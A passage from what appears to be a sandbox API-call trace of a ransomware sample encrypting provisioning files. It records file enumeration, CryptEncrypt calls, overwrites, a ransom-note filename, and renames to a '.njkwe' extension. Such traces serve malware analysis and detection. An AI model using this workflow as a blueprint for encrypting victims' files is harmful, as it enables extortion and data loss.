(lpString1="235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.503] lstrcmpiW (lpString1="235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.503] lstrcmpiW (lpString1="235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.503] lstrcmpiW (lpString1="235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.503] lstrcmpiW (lpString1="235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.503] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml") returned 156 [0077.503] StrStrIW (lpFirst="235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.503] lstrcmpW (lpString1="235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.503] lstrcmpW (lpString1="235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.503] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\235__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.503] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\235__connections_cellular_lmt (latvia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.503] GetTickCount () returned 0x1153b5f [0077.503] GetTickCount () returned 0x1153b5f [0077.503] GetTickCount () returned 0x1153b5f [0077.503] GetTickCount () returned 0x1153b5f [0077.503] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.503] GetProcessHeap () returned 0xbe0000 [0077.503] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.504] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x383, lpOverlapped=0x0) returned 1 [0077.505] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.505] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x383, lpOverlapped=0x0) returned 1 [0077.505] GetProcessHeap () returned 0xbe0000 [0077.505] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.505] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.505] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.505] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.505] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.506] CloseHandle (hObject=0x43c) returned 1 [0077.506] GetProcessHeap () returned 0xbe0000 [0077.506] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.506] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0077.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\235__connections_cellular_lmt (latvia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\235__Connections_Cellular_LMT (Latvia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\235__connections_cellular_lmt (latvia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.506] GetProcessHeap () returned 0xbe0000 [0077.506] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.506] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x908b0722, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x908b0722, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x908b0722, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x310, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="236__C~1.PRO")) returned 1 [0077.506] lstrcmpiW (lpString1="236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.506] lstrcmpiW (lpString1="236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.506] lstrcmpiW (lpString1="236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.506] lstrcmpiW (lpString1="236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.506] lstrcmpiW (lpString1="236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.507] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml") returned 158 [0077.507] StrStrIW (lpFirst="236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.507] lstrcmpW (lpString1="236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.507] lstrcmpW (lpString1="236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.507] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\236__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.507] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\236__connections_cellular_tele2 (latvia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.507] GetTickCount () returned 0x1153b5f [0077.507] GetTickCount () returned 0x1153b5f [0077.507] GetTickCount () returned 0x1153b5f [0077.507] GetTickCount () returned 0x1153b5f [0077.507] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.507] GetProcessHeap () returned 0xbe0000 [0077.507] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.507] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x310, lpOverlapped=0x0) returned 1 [0077.509] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.509] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x310, lpOverlapped=0x0) returned 1 [0077.509] GetProcessHeap () returned 0xbe0000 [0077.509] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.509] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.509] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.509] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.509] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.509] CloseHandle (hObject=0x43c) returned 1 [0077.509] GetProcessHeap () returned 0xbe0000 [0077.509] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.509] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0077.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\236__connections_cellular_tele2 (latvia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\236__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\236__connections_cellular_tele2 (latvia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.510] GetProcessHeap () returned 0xbe0000 [0077.510] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.510] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x908b0722, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x908b0722, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x908b0722, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x309, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="237__C~1.PRO")) returned 1 [0077.510] lstrcmpiW (lpString1="237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.510] lstrcmpiW (lpString1="237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.510] lstrcmpiW (lpString1="237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.510] lstrcmpiW (lpString1="237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.510] lstrcmpiW (lpString1="237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.510] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml") returned 158 [0077.510] StrStrIW (lpFirst="237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.510] lstrcmpW (lpString1="237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.510] lstrcmpW (lpString1="237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.510] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\237__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.510] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\237__connections_cellular_tele2 (latvia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.511] GetTickCount () returned 0x1153b5f [0077.511] GetTickCount () returned 0x1153b5f [0077.511] GetTickCount () returned 0x1153b5f [0077.511] GetTickCount () returned 0x1153b5f [0077.511] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.511] GetProcessHeap () returned 0xbe0000 [0077.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.511] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x309, lpOverlapped=0x0) returned 1 [0077.515] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.515] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x309, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x309, lpOverlapped=0x0) returned 1 [0077.515] GetProcessHeap () returned 0xbe0000 [0077.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.515] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.515] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.516] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.516] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.516] CloseHandle (hObject=0x43c) returned 1 [0077.516] GetProcessHeap () returned 0xbe0000 [0077.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.516] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0077.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\237__connections_cellular_tele2 (latvia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\237__Connections_Cellular_Tele2 (Latvia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\237__connections_cellular_tele2 (latvia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.517] GetProcessHeap () returned 0xbe0000 [0077.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.517] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x908d698d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x908d698d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x908d698d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml", cAlternateFileName="238__C~1.PRO")) returned 1 [0077.517] lstrcmpiW (lpString1="238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.517] lstrcmpiW (lpString1="238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.517] lstrcmpiW (lpString1="238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.517] lstrcmpiW (lpString1="238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.517] lstrcmpiW (lpString1="238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.517] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml") returned 158 [0077.517] StrStrIW (lpFirst="238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.517] lstrcmpW (lpString1="238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.517] lstrcmpW (lpString1="238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.517] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\238__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.517] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\238__connections_cellular_alfa (lebanon)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.517] GetTickCount () returned 0x1153b6f [0077.517] GetTickCount () returned 0x1153b6f [0077.517] GetTickCount () returned 0x1153b6f [0077.517] GetTickCount () returned 0x1153b6f [0077.518] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.518] GetProcessHeap () returned 0xbe0000 [0077.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.518] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0077.522] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.523] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0077.523] GetProcessHeap () returned 0xbe0000 [0077.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.523] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.523] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.523] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.523] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.523] CloseHandle (hObject=0x43c) returned 1 [0077.523] GetProcessHeap () returned 0xbe0000 [0077.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.523] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0077.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\238__connections_cellular_alfa (lebanon)_i0$(__mvid)@wap.provxml"), 